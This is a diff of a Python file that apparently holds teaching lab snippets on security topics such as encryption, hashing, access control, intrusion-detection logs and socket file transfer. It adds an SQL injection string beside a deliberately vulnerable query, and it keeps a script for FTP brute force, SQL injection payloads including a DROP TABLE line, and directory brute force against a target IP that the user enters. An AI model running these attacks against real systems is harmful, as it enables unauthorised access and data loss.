@@ -20,6 +20,8 @@ print(f"Encrypted:", encrypted)
 print(f"Decrypted:", decrypted, "\n")
 
 
+
+
 #Integrity - SHA-256
 
 import hashlib
@@ -31,6 +33,9 @@ print("\nHash1:", hash1)
 print("Hash2:", hash2)
 print(f"Integrity Verified?", hash1 == hash2, "\n")
 
+
+
+
 #Availability - Backup
 
 import shutil
@@ -41,6 +46,8 @@ shutil.copyfile(original_file, backup_file)
 print("Backup completed!")
 
 
+
+
 #Authentication - User $ Pass Check
 
 users = {
@@ -55,6 +62,8 @@ else:
     print("Access denied\n")
 
 
+
+
 #Non-Repudiation - Digital Signature
 
 import hashlib
@@ -66,6 +75,11 @@ received_message = "The received message to be signed"
 received_signature = hashlib.sha256(received_message.encode()).hexdigest()
 print(f"\nSignature Verified:", signature == received_signature,'\n')
 
+
+
+
+
+
 #Accountability - Logging
 
 import datetime
@@ -101,12 +115,13 @@ def login(username, password):
    else:
        print("Access Denied!")
 
-# Demo
 register("admin", "securepass")
 login("admin", "securepass")
 login("admin", "wrongpass")
 
 
+
+
 #Role Based File Access - Read/Write perms
 
 permissions = {
@@ -124,6 +139,9 @@ access_file("admin", "write")
 access_file("user1", "write")
 
 
+
+
+
 #File Encryption - AES
 
 from cryptography.fernet import Fernet
@@ -146,6 +164,9 @@ def encrypt_file(filename):
 encrypt_file("sample.txt")
 
 
+
+
+
 #File Integrity - Anti Tamper
 
 import hashlib
@@ -163,6 +184,9 @@ else:
    print(" File has been changed!")
 
 
+
+
+
 #Firewall Simulation
 
 blocked_ips = ["192.168.1.100", "10.0.0.5"]
@@ -176,6 +200,9 @@ check_access("192.168.1.100")
 check_access("8.8.8.8")
 
 
+
+
+
 #Activity Logging 
 
 import datetime
@@ -191,6 +218,10 @@ log_activity("admin", "Accessed Settings")
 log_activity("guest", "Tried to Delete File")
 print("File Created")
 
+
+
+
+
 #Memory Allocation
 
 memory = [None] * 100
@@ -215,6 +246,9 @@ print(allocate("P2", 20))
 print(deallocate("P1"))
 
 
+
+
+
 #Memory Monitor
 
 import os, psutil
@@ -223,6 +257,9 @@ process = psutil.Process(os.getpid())
 print(f" Current Memory Usage: {process.memory_info().rss / 1024**2:.2f} MB")
 
 
+
+
+
 #Garbage Collection
 
 import gc
@@ -235,6 +272,9 @@ gc.collect()
 print("Garbage collected")
 
 
+
+
+
 #Paging Simulation
 
 import math
@@ -249,7 +289,9 @@ for k, v in table.items():
    print(f"{k} → {v}")
 
 
-#Memory Leak Simul 
+
+
+#Memory Leak Simulation
 
 import tracemalloc
 tracemalloc.start()
@@ -267,6 +309,8 @@ for stat in top_stats[:3]:
    print(stat)
 
 
+
+
 #Buffer Overflow Simulation
 
 def safe_array_write(array, index, value):
@@ -323,6 +367,9 @@ with open("receiver_public_key.pem", "wb") as f:
 print("RSA keys generated and saved.")
 
 
+
+
+
 #Message Encrypter
 
 from cryptography.hazmat.primitives import hashes
@@ -353,10 +400,14 @@ with open("signature.bin", "wb") as f:
 
 print("Message encrypted and signed.")
 
+
+
+
+
 #Message Decrypter
 
 with open("receiver_private_key.pem", "rb") as f:
-    receiver_private_k= serialization.load_pem_private_key(f.read(),password=None)
+    receiver_private_key= serialization.load_pem_private_key(f.read(),password=None)
 
 
 with open("sender_public_key.pem", "rb") as f:
@@ -412,6 +463,8 @@ cursor.execute(query)
 
 # cursor.execute("SELECT * FROM users WHERE username = ? AND password = ?",(username, password))
 
+# ' OR '1'='1' --
+
 result = cursor.fetchone()
 print(result)
 
@@ -422,6 +475,7 @@ else:
 
 
 
+
 #DB Encrypt
 
 import sqlite3
@@ -450,6 +504,9 @@ else:
     print("Login failed.")
 
 
+
+
+
 #RBAC DB
 
 import sqlite3
@@ -486,6 +543,7 @@ else:
 
 
 
+
 #DB Fields Encrypt
 
 from cryptography.fernet import Fernet
@@ -504,7 +562,7 @@ def vp_5():
     print(Fore.RED + '''
 
           
-#Network security User Res + Login
+#Network security User Res + Login (user_auth.py)
 
 import sqlite3
 import hashlib
@@ -526,6 +584,7 @@ def hash_password(password, salt=None):
     hash_val = hashlib.pbkdf2_hmac('sha256', password.encode(), salt.encode(), 100000)
     return salt, hash_val.hex()
 
+
 def register_user(username, password):
     conn = sqlite3.connect('users.db')
     cursor = conn.cursor()
@@ -559,8 +618,8 @@ if __name__ == "__main__":
     print(register_user("johndoe", "anotherpass"))
     print("Login success?" , authenticate_user("johndoe", "john@123"))
     print("Login success?" , authenticate_user("alice", "wrongpass"))
-
-
+    
+    
 
 #Timestamp Attack Detection
 
@@ -671,7 +730,7 @@ while True:
 
 #Encrypted File Transfer
 
-Server: 
+Server (file_server.py):
 
 import socket
 import json
@@ -737,7 +796,7 @@ else:
 
 
 
-Client:
+Client (file_client.py):
 
 import socket
 import json
@@ -786,8 +845,15 @@ print(" Server:", client.recv(1024).decode())
 client.close()
 
 
+
+
+
+
 #Password based login replaced with RSA public-key authentication
 
+
+gen_keys.py:
+
 from cryptography.hazmat.primitives.asymmetric import rsa
 from cryptography.hazmat.primitives import serialization
 
@@ -810,7 +876,8 @@ with open("client_public.pem", "wb") as f:
 
 
 
-RSA Server:
+RSA Server (rsa_server.py):
+
 import socket
 import os
 import secrets
@@ -832,7 +899,7 @@ print(" Connected by", addr)
 challenge = secrets.token_bytes(32)
 conn.send(challenge)
 
-signature = conn.recv(512)
+signature = conn.recv(256)
 try:
     client_public_key.verify(
     signature,
@@ -850,7 +917,7 @@ conn.close()
 
 
 
-RSA Client:
+RSA Client (rsa_client.py):
 
 import socket
 from cryptography.hazmat.primitives.asymmetric import padding
@@ -885,8 +952,51 @@ def vp_6():
 
 #Cloud Security - Secure file upload and access on cloud with encryption and access control
 
+pip install localstack
+
+#init_db.py
+
+import sqlite3
+
+def init_db():
+    conn = sqlite3.connect('cloud_users.db')
+    c = conn.cursor()
+    c.execute("""
+    CREATE TABLE IF NOT EXISTS users (
+        username TEXT PRIMARY KEY,
+        role TEXT NOT NULL
+    )
+    """)
+
+    c.execute('INSERT OR IGNORE INTO users VALUES (?, ?)', ("admin", "admin"))
+    c.execute('INSERT OR IGNORE INTO users VALUES (?, ?)', ("bob", "viewer"))
+    
+    conn.commit()
+    conn.close()
+    
+if __name__ == "__main__":
+    init_db()
+    print(" DB Initialized")
+    
+    
+
+#generate_keys.py
+
+from cryptography.fernet import Fernet
+
+key = Fernet.generate_key()
+
+with open("aes.key", "wb") as f:
+    f.write(key)
+print(" AES Key Generated")
+
+
+
+
 #Cloud Encrypt:
 
+#cloud_encrypt_upload.py
+
 import boto3
 from cryptography.fernet import Fernet
 import sqlite3
@@ -942,6 +1052,8 @@ if __name__ == "__main__":
 
 Cloud decrypt:
 
+#cloud_decrypt_download.py
+
 import boto3
 from cryptography.fernet import Fernet
 import sqlite3
@@ -1009,10 +1121,10 @@ TOKENS = {}
 @app.route("/generate_link")
 def generate_link():
    token = secrets.token_urlsafe(16)
-   expiry = datetime.now() + timedelta(seconds=30)
+   expiry = datetime.now() + timedelta(seconds=60)
    TOKENS[token] = expiry
    return f"""
-       Temporary link created. Use it within 30 seconds:&lt;br&gt;&lt;br&gt;
+       Temporary link created. Use it within 60 seconds:&lt;br&gt;&lt;br&gt;
        &lt;a href="/download?token={token}"&gt;Download Link&lt;/a&gt;
        """
 
@@ -1032,6 +1144,8 @@ if __name__ == "__main__":
    app.run(debug=True)
 
 
+
+
 #Client Side Encrypted Backup - Zero Trust
 
 from cryptography.fernet import Fernet
@@ -1047,68 +1161,90 @@ key = Fernet.generate_key()
 fernet = Fernet(key)
 
 with open("aes.key", "wb") as kf:
-   kf.write(key)
+    kf.write(key)
 
 # Step 2: Encrypt the file
 def encrypt_file(file_path):
-   with open(file_path, "rb") as f:
-       data = f.read()
-       
-   encrypted_data = fernet.encrypt(data)
+    with open(file_path, "rb") as f:
+        data = f.read()
 
-   encrypted_file_path = "enc_" + os.path.basename(file_path)
-   with open(encrypted_file_path, "wb") as ef:
-       ef.write(encrypted_data)
+    encrypted_data = fernet.encrypt(data)
+
+    encrypted_file_path = "enc_" + os.path.basename(file_path)
+    with open(encrypted_file_path, "wb") as ef:
+        ef.write(encrypted_data)
+
+    # Simulate cloud upload (just copying)
+    shutil.copy(encrypted_file_path, os.path.join("cloud_backup", encrypted_file_path))
+    print(f"Encrypted and uploaded: {encrypted_file_path}")
 
-   # Simulate cloud upload (just copying)
-   shutil.copy(encrypted_file_path, os.path.join("cloud_backup", encrypted_file_path))
-   print(f"Encrypted and uploaded: {encrypted_file_path}")
 
 if __name__ == "__main__":
-   input_file = "sample_file.txt"
+    input_file = "sample2.txt"
+
+    if not os.path.exists(input_file):
+        with open(input_file, "w") as f:
+            f.write("Confidential Cloud Backup File")
+
+    encrypt_file(input_file)
 
-# Create file if not present
-if not os.path.exists(input_file):
-   with open(input_file, "w") as f:
-       f.write("Confidential Cloud Backup File")
 
-encrypt_file(input_file)
 
 
 #IDS - Cloud Access Logs
 
+
+logs.json:
+
+[
+    {"user": "alice", "ip": "192.168.1.10", "timestamp": "2025-08-05 22:30:00", "status":
+    "success"},
+    {"user": "john", "ip": "10.0.0.5", "timestamp": "2025-08-05 09:15:00", "status": "failed"},
+    {"user": "alice", "ip": "10.0.0.6", "timestamp": "2025-08-05 02:00:00", "status": "success"},
+    {"user": "charlie", "ip": "172.16.0.8", "timestamp": "2025-08-05 19:00:00", "status": "failed"},
+    {"user": "john", "ip": "10.0.0.5", "timestamp": "2025-08-05 09:17:00", "status": "failed"}
+]
+
+
+
+
+log_monitor.py:
+
+
 import json
 from datetime import datetime
 
 blacklisted_ips = ["192.168.1.10", "10.0.0.5"]
 
 with open("logs.json") as f:
-   logs = json.load(f)
+    logs = json.load(f)
 
 failed_attempts = {}
 
 print("\n Intrusion Detection Log Analysis:\n")
 
 for entry in logs:
-   user = entry["user"]
-   ip = entry["ip"]
-   time = datetime.strptime(entry["timestamp"], "%Y-%m-%d %H:%M:%S")
-   status = entry["status"]
+    user = entry["user"]
+    ip = entry["ip"]
+    time = datetime.strptime(entry["timestamp"], "%Y-%m-%d %H:%M:%S")
+    status = entry["status"]
 
-if ip in blacklisted_ips:
-   print(f" ALERT: Access from blacklisted IP {ip} by user '{user}'")
+    if ip in blacklisted_ips:
+        print(f" ALERT: Access from blacklisted IP {ip} by user '{user}'")
 
-if not (8 <= time.hour <= 18):
-   print(f" Off-hour login attempt by '{user}' at {time.strftime('%H:%M')}")
+    if not (8 <= time.hour <= 18):
+        print(f" Off-hour login attempt by '{user}' at {time.strftime('%H:%M')}")
 
-if status == "failed":
-   failed_attempts[user] = failed_attempts.get(user, 0) + 1
-   if failed_attempts[user] >= 2:
-       print(f" User '{user}' has {failed_attempts[user]} failed login attempts!")
+    if status == "failed":
+        failed_attempts[user] = failed_attempts.get(user, 0) + 1
+        if failed_attempts[user] >= 2:
+            print(f" User '{user}' has {failed_attempts[user]} failed login attempts!")
 
 print("\n Log scan completed.\n")
 
 
+
+
 #Invisible Watermarking
 
 import hashlib
@@ -1118,28 +1254,30 @@ import shutil
 os.makedirs("cloud_upload", exist_ok=True)
 
 def watermark_text(file_path, user_id):
-   with open(file_path, "r") as f:
-       content = f.read()
+    with open(file_path, "r") as f:
+        content = f.read()
 
-   watermark = f"\n<!--USER-ID: {hashlib.sha256(user_id.encode()).hexdigest()}-->"
-   watermarked_file = "wm_" + os.path.basename(file_path)
-   with open(watermarked_file, "w") as f:
-       f.write(content + watermark)
+    watermark = f"\n<!--USER-ID: {hashlib.sha256(user_id.encode()).hexdigest()}-->"
 
-   cloud_path = os.path.join("cloud_upload", watermarked_file)
-   shutil.copy(watermarked_file, cloud_path)
-   
-   print(f" File watermarked and uploaded to: {cloud_path}")
+    watermarked_file = "wm_" + os.path.basename(file_path)
+    with open(watermarked_file, "w") as f:
+        f.write(content + watermark)
+
+    cloud_path = os.path.join("cloud_upload", watermarked_file)
+    shutil.copy(watermarked_file, cloud_path)
+
+    print(f" File watermarked and uploaded to: {cloud_path}")
 
 if __name__ == "__main__":
-   input_file = "sample_file.txt"
+    input_file = "sample2.txt"
 
-if not os.path.exists(input_file):
-   with open(input_file, "w") as f:
-       f.write("This is confidential content for cloud storage.")
+    if not os.path.exists(input_file):
+        with open(input_file, "w") as f:
+            f.write("This is confidential content for cloud storage.")
 
-watermark_text(input_file, user_id="user123")
-          ''')
+    watermark_text(input_file, user_id="user123")
+    
+''')
       
 def vp_7():
     print(Fore.RED + '''
@@ -1165,12 +1303,14 @@ print(f"Decrypted Data: {decrypted_data}\n")
 
 
 
+
 #HMAC Integrity
 
 import hmac
 import hashlib
 
 secret_key = b"iot_secret_key"
+
 message = b"Sigma: 100%"
 
 hmac_digest = hmac.new(secret_key, message, hashlib.sha256).hexdigest()
@@ -1180,9 +1320,10 @@ print(f"Generated HMAC: {hmac_digest}")
 received_hmac = hmac.new(secret_key, message, hashlib.sha256).hexdigest()
 
 if hmac.compare_digest(hmac_digest, received_hmac):
-   print(f"Message is authentic\n")
+    print(f"Message is authentic\n")
 else:
-   print(f"Message tampered!\n")
+    print(f"Message tampered!\n")
+
 
 
 
@@ -1216,6 +1357,8 @@ client.loop_stop()
 client.disconnect()
 
 
+
+
 #Packet Sniffing
 
 from scapy.all import sniff
@@ -1237,6 +1380,7 @@ sniff(prn=packet_callback, count=10)
 def vp_8():
     print(Fore.RED + '''
 
+#Certificate Collision
           
 def toy_hash(b: bytes) -> int:
    return sum(b) % 256
@@ -1302,12 +1446,11 @@ def main():
    with open("cert2_demo_padded.pem", "wb") as f:
        f.write(cert2_padded)
 
-   print("\nWrote cert1_demo.pem and cert2_demo_padded.pem to disk (different files).")
-   print("You can show students: files differ, but toy_hash(...) is the same.")
 if __name__ == "__main__":
    main()
 
 
+
 #HASH
 
 import hashlib
@@ -1417,49 +1560,10 @@ if __name__ == "__main__":
 
 #FTP Brute Force, SQL Injection, Simple Dir Brute Force
 
-import socket
 import requests
 import ftplib
 from datetime import datetime
 
-vulnerabilities = {
-"Apache/2.2.8": "Outdated Apache version - vulnerable to CVE-2009-3555",
-"OpenSSH_4.7": "Old OpenSSH version - possible remote exploits",
-"Microsoft-IIS/6.0": "IIS 6.0 is deprecated - vulnerable to multiple attacks"
-}
-
-def scan_ports(target, ports):
-    open_ports = []
-    print(f"\n[*] Scanning {target} ...")
-    for port in ports:
-        try:
-            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-            sock.settimeout(0.5)
-            result = sock.connect_ex((target, port))
-            if result == 0:
-                print(f"[+] Port {port} is OPEN")
-                open_ports.append(port)
-            sock.close()
-        except:
-            pass
-    return open_ports
-
-def grab_banner(ip, port):
-    try:
-        sock = socket.socket()
-        sock.settimeout(1)
-        sock.connect((ip, port))
-        banner = sock.recv(1024).decode().strip()
-        sock.close()
-        return banner
-    except:
-        return None
-
-def check_vulnerabilities(banner):
-    for vuln in vulnerabilities:
-        if vuln in banner:
-            return vulnerabilities[vuln]
-    return "No known vulnerability in database."
 
 def ftp_bruteforce(target, user, wordlist):
     print(f"\n[*] Starting FTP Brute Force on {target}")
@@ -1474,6 +1578,7 @@ def ftp_bruteforce(target, user, wordlist):
             print(f"[-] Failed: {user}:{password}")
             print("[!] No valid credentials found.")
 
+
 def sql_injection_test(url, param):
     print(f"\n[*] Testing SQL Injection on {url}")
     payloads = ["&#39; OR &#39;1&#39;=&#39;1", "&#39; OR &#39;x&#39;=&#39;x", "&#39;; DROP TABLE users; --"]
@@ -1502,23 +1607,22 @@ def dir_bruteforce(url, wordlist):
 
 if __name__ == "__main__":
     target = input("Enter Target IP (e.g., 127.0.0.1): ")
-    ports_to_scan = [21, 22, 23, 25, 80, 110, 143, 443, 3389]
     start_time = datetime.now()
-    open_ports = scan_ports(target, ports_to_scan)
-    print("\n[*] Banner Grabbing and Vulnerability Check:")
-    for port in open_ports:
-        banner = grab_banner(target, port)
-        if banner:
-            print(f"\n[Port {port}] Service Banner: {banner}")
-            print(" -&gt; " + check_vulnerabilities(banner))
-        else:
-            print(f"\n[Port {port}] No banner retrieved.")
-   
+    
+    # FTP Brute Force Attack
     ftp_wordlist = ["1234", "admin", "password", "toor"]
     ftp_bruteforce(target, "admin", ftp_wordlist)
+    
+    # SQL Injection Attack
     sql_injection_test("http://127.0.0.1/vulnerable.php", "id")
+    
+    # Directory Brute Force Attack
     wordlist = ["admin", "login", "test", "uploads"]
     dir_bruteforce("http://127.0.0.1", wordlist)
+    
     end_time = datetime.now()
-    print("\n[*] Scan completed in:", end_time - start_time)
-          ''')
\ No newline at end of file
+    print("\n[*] Attacks completed in:", end_time - start_time)
+
+
+
+''')
\ No newline at end of file
